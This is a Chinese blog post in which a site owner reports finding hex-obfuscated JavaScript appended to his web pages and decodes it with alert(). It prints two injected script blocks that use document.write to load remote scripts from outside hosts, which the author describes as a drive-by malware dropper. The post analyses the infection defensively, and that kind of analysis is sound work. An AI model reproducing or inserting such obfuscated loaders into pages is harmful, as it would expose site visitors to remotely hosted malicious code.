加密js怎么解密?文件尾竟被加入病毒\x64\x6f\x63\x75\x6d\x65\x6e\x74

 2022-10-28    6002  

今天打开一个自己的网页,竟发现了文件尾巴病毒源,真是可恶,空间商没做好杀毒防毒啊。

病毒源如下:

 <script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>

这是一段通过16进制编码的script病毒,当你打开含有这段代码的页面时,那你的电脑立马中毒,好狠啊!

可以通过alert来解密,例如把上面粗体字代码解密:

<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>

解密结果是:document

同样的,把后面各个中括号里的代码段alert,结果这个病毒源代码就出来了。上面的病毒源代码解密结果是:

document.write("<script language=javascript src=http://gg999.5166.info/gg/gg.js></script>");

很明显,这是在你电脑执行一段javascript挂马程序,一旦你打开含有这段代码的页面,你的电脑就立即中招了。

这些病毒我暂时没找到专杀软件,例如你有上千个页面都中毒了,那是不能手动一个一个清除的了。一旦我找到专杀软件,会第一时间来博客共享。有网友发现专杀软件了吗?

分享到:

本文链接:https://blog.lingruofeng.com/seo/38.html

版权声明:本站部分素材来自网络整理,如侵犯了您的合法权益,请联系我们删除!